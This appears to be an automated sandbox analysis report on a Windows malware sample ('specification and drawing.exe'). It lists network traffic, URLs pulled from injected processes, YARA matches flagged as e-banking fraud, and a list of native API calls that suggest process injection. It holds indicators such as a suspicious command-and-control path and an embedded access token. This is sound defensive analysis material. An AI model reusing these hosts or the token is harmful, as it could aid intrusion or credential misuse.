                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 13:40:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.1 Date: Mon, 02 Dec 2024 13:40:33 GMT Content-Length: 0 Connection: close X-Rate-Limit-Limit: 5s X-Rate-Limit-Remaining: 19 X-Rate-Limit-Reset: 2024-12-02T13:40:38.8801182Z
                      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 02 Dec 2024 13:40:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Bj%2FhUPlA8uq5yAyuZjDrV2m8Maf1noh2zh%2FEkSNIIo86l%2FuVuM4B%2BwREoHQOzzvaevROgvaeLhdansIE0nH0VlE%2B5eFe%2B7wu9ZiCoLNJc%2FiEa%2B0Aw6bneun38fR7H%2Fwei1Usw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ebbbb28bb180f53-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1474&rtt_var=737&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=550&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: 1fb4<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://giganet.ua/ru
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://inau.ua/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://partner.mirohost.net
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://schema.org/Organization
                      Source: specification and drawing.exe, 00000000.00000002.2178181816.0000000002DC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.ix.net.ua/ru
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4592454426.0000000004BF3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nagasl89.baby
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4592454426.0000000004BF3000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nagasl89.baby/w21a/
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: specification and drawing.exeString found in binary or memory: https://api.particle.io/v1/devices/13300350003473433373737385/digitalread?access_token=Q235ad2c91cac
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://companies.rbc.ru/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.imena.ua/login.php?lang=2
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://control.mirohost.net/auth/login.php?lang=ru
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.imena.ua/css/media-set.css
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.imena.ua/js/bundle.min.js
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: wscript.exe, 00000008.00000003.2595734856.0000000007C76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.Z
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: wscript.exe, 00000008.00000002.4585557607.0000000000923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mail.mirohost.net
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.synd.fun&rand=
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: wscript.exe, 00000008.00000003.2602144851.0000000007C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/blog/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/check-domain
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/check-domain?step=transfer
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/contact
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/datacenter
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/documents
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/premium-domains
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/prices
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/domains/regtm
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/en
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/en/how-search
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/help
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/hosting
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/how-search
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/job
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/payments
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/ru
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/servers
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/support/domains-finance/icann-i-ee-funkcii
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/support/domains-finance/sposoby-oplaty-uslug-imena-ua
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/ua
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/vps
                      Source: LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.imena.ua/whois.php?domain=spectre.center
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.rbc.ru/technology_and_media/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_server&
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_new&am
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.synd.fun&utm_medium=parking&utm_campaign=s_land_host&amp;
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000590C000.00000004.10000000.00040000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.000000000316C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.synd.fun&amp;reg_source=parking_auto
                      Source: wscript.exe, 00000008.00000002.4591433307.000000000577A000.00000004.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4593196854.0000000007880000.00000004.00000800.00020000.00000000.sdmp, LfvKCNKdvt.exe, 0000000A.00000002.4590727435.0000000002FDA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.ripe.net/

                      E-Banking Fraud

                      Source: Yara match File source: 4.2.specification and drawing.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 4.2.specification and drawing.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000A.00000002.4592454426.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2401176438.0000000001030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.4590637504.0000000004660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000008.00000002.4590687371.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000007.00000002.4589607610.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000004.00000002.2402440519.0000000001E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_0042CB93 NtClose,4_2_0042CB93
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102B60 NtClose,LdrInitializeThunk,4_2_01102B60
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_01102DF0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01102C70
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_011035C0 NtCreateMutant,LdrInitializeThunk,4_2_011035C0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01104340 NtSetContextThread,4_2_01104340
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01104650 NtSuspendThread,4_2_01104650
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102B80 NtQueryInformationFile,4_2_01102B80
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102BA0 NtEnumerateValueKey,4_2_01102BA0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102BF0 NtAllocateVirtualMemory,4_2_01102BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102BE0 NtQueryValueKey,4_2_01102BE0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102AB0 NtWaitForSingleObject,4_2_01102AB0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102AD0 NtReadFile,4_2_01102AD0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102AF0 NtWriteFile,4_2_01102AF0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102D10 NtMapViewOfSection,4_2_01102D10
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102D00 NtSetInformationFile,4_2_01102D00
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102D30 NtUnmapViewOfSection,4_2_01102D30
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102DB0 NtEnumerateKey,4_2_01102DB0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102DD0 NtDelayExecution,4_2_01102DD0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102C00 NtQueryInformationProcess,4_2_01102C00
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102C60 NtCreateKey,4_2_01102C60
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102CA0 NtQueryInformationToken,4_2_01102CA0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102CC0 NtQueryVirtualMemory,4_2_01102CC0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102CF0 NtOpenProcess,4_2_01102CF0
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102F30 NtCreateSection,4_2_01102F30
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102F60 NtCreateProcessEx,4_2_01102F60
                      Source: C:\Users\user\Desktop\specification and drawing.exe Code function: 4_2_01102F90 NtProtectVirtualMemory,4_2_01102F90
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102FB0 NtResumeThread,4_2_01102FB0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102FA0 NtQuerySection,4_2_01102FA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102FE0 NtCreateFile,4_2_01102FE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102E30 NtWriteVirtualMemory,4_2_01102E30
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102E80 NtReadVirtualMemory,4_2_01102E80
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102EA0 NtAdjustPrivilegesToken,4_2_01102EA0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102EE0 NtQueueApcThread,4_2_01102EE0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103010 NtOpenDirectoryObject,4_2_01103010
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103090 NtSetValueKey,4_2_01103090
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011039B0 NtGetContextThread,4_2_011039B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103D10 NtOpenProcessToken,4_2_01103D10
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01103D70 NtOpenThread,4_2_01103D70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04924650 NtSuspendThread,LdrInitializeThunk,8_2_04924650
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04924340 NtSetContextThread,LdrInitializeThunk,8_2_04924340
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04922CA0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04922C70
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922C60 NtCreateKey,LdrInitializeThunk,8_2_04922C60
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922DD0 NtDelayExecution,LdrInitializeThunk,8_2_04922DD0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04922DF0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04922D10
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_04922D30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_04922E80
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922EE0 NtQueueApcThread,LdrInitializeThunk,8_2_04922EE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922FB0 NtResumeThread,LdrInitializeThunk,8_2_04922FB0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922FE0 NtCreateFile,LdrInitializeThunk,8_2_04922FE0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922F30 NtCreateSection,LdrInitializeThunk,8_2_04922F30
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922AD0 NtReadFile,LdrInitializeThunk,8_2_04922AD0
                      Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_04922AF0 NtWriteFile,LdrInitializeThunk,8_2_04922AF0
